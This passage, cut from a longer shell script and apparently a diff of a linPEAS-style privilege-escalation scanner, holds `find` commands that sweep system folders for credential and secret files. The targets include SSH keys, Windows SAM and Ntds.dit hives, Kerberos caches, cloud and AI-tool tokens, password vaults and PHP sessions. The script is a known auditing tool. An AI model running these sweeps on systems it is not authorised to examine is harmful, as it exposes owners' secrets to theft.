-name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"ssh*config\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"drives.xml\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"security.sav\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find ${ROOT_FOLDER}var -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"sess_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CONCOURSE_AUTH=`eval_bckgrd "find ${ROOT_FOLDER}concourse-auth -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CONCOURSE_KEYS=`eval_bckgrd "find ${ROOT_FOLDER}concourse-keys -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter fi if [ "$SEARCH_IN_FOLDER" ] || echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then #GENERATE THE STORAGES OF THE FOUND FILES - PSTORAGE_SYSTEMD=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}run|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}system|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}etc" | grep -E ".*\.service$" | sort | uniq | head -n 70) - PSTORAGE_TIMER=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}run|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}system|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}etc" | grep -E ".*\.timer$" | sort | uniq | head -n 70) - PSTORAGE_SOCKET=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}run|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}system|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}etc" | grep -E ".*\.socket$" | sort | uniq | head -n 70) - PSTORAGE_DBUS=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc" | grep -E "system\.d$" | sort | uniq | head -n 70) - PSTORAGE_MYSQL=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "mysql$|passwd\.ibd$|password.*\.ibd$|pwd\.ibd$|mysqld\.cnf$" | sort | uniq | head -n 70) - PSTORAGE_MARIADB=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) - PSTORAGE_POSTGRESQL=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$|pgadmin4\.db$" | sort | uniq | head -n 70) - PSTORAGE_APACHE_NGINX=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$|nginx\.conf$|nginx$" | sort | uniq | head -n 70) - PSTORAGE_VARNISH=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "varnish$" | sort | uniq | head -n 70) - PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^${ROOT_FOLDER}private|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}var|^${ROOT_FOLDER}mnt" | grep -E "sess_.*$" | sort | uniq | head -n 70) - PSTORAGE_PHP_FILES=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_APACHE_AIRFLOW=$(echo -e 